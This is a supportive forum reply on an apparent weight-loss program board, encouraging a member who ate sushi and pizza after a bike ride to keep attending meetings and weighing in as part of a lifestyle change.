From what I have seen some sushi isn't that bad but some are. The pizza...well, I've been there. More than once and sometimes you just need some pizza :). You busted your butt on that bike ride so you earned some APs.
Yesterday my meeting leader was talking about how sometimes people only want to go to meetings when they know they've lost but not when they are anticipating a gain, but that is when the meetings and WIs are needed most. A lifestyle change means the ups and downs and getting support and holding yourself accountable for both. I'm glad that you went to your meeting and understand why you didn't weigh, but sometimes seeing the proof on the scale helps get us motivated. Not that it isn't a bummer sometimes (I've been there) but I think seeing the ups and downs helps us understand that this is a lifestyle change and not a diet.

That is my LONG way of saying, you could have done worse but you posted about it and that shows that you are aware which is a good thing. It's all about learning more about ourselves and what makes us tick. Good luck this week! :)
